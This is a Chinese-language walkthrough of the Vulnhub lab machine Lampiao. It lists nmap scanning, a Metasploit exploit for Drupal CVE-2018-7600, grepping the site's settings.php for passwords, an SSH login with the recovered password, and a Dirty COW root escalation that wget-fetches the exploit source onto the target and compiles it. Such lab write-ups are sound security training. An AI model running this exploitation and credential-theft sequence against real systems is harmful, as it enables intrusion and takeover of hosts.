Vulnhub靶机实战-Lampiao

声明

好好学习，天天向上

搭建

使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连

渗透

存活扫描，发现目标

arp-scan -l
nmap -sP 192.168.239.1/24

端口扫描

nmap -T4 -A 192.168.239.12 -p 1-65535 -oN nmap.A

开启端口

发现开启80，22，1898

访问80

http://192.168.239.12

80开了个寂寞

dirscan连接还有问题

看看1898的drupal吧

http://192.168.239.12:1898

dirscan扫描目录

python3 dirsearch.py -u 192.168.239.12:1898

看看robots里面有啥吧

看到cms的版本更新到Drupal 7.54了

利用漏洞

Drupal核心远程代码执行漏洞CVE-2018-7600

使用msf

msfconsole
search CVE-2018-7600
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.239.12
set RPORT 1898
show options
run

进入

shell

查看都有哪些用户以及数据库密码

ls /home
cat /var/www/html/sites/default/settings.php | grep password

得到了一个用户tango和两个密码

password
Virgulino

尝试登录

ssh tango@192.168.239.12
Virgulino

使用脏牛提权

命令：

searchsploit dirty

查找脏牛提权shell，利用40847.cpp
使用CP进行复制到本地

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ./

思路是继续开启本地pthon服务，然后把40847.cp发送到靶机上。

python -m SimpleHTTPServer 5555

靶机执行

wget http://192.168.239.13:5555/40847.cpp

执行

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时，需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件，可直接提权。

执行完后生成脚本，执行脚本

./40847 -s

总结

1.信息收集

端口发现80、22、1898

通过80，看了个寂寞

通过1898，发现了drupal的信息，查看敏感目录，发现了版本

2.web权限

无

3.shell权限

通过drupal的CVE漏洞拿到shell，并查看到了配置文件

4.权限维持

利用配置文件进行ssh登录

5.提权

脏牛提权，开启站点，生成脚本，编译执行拿到root和flag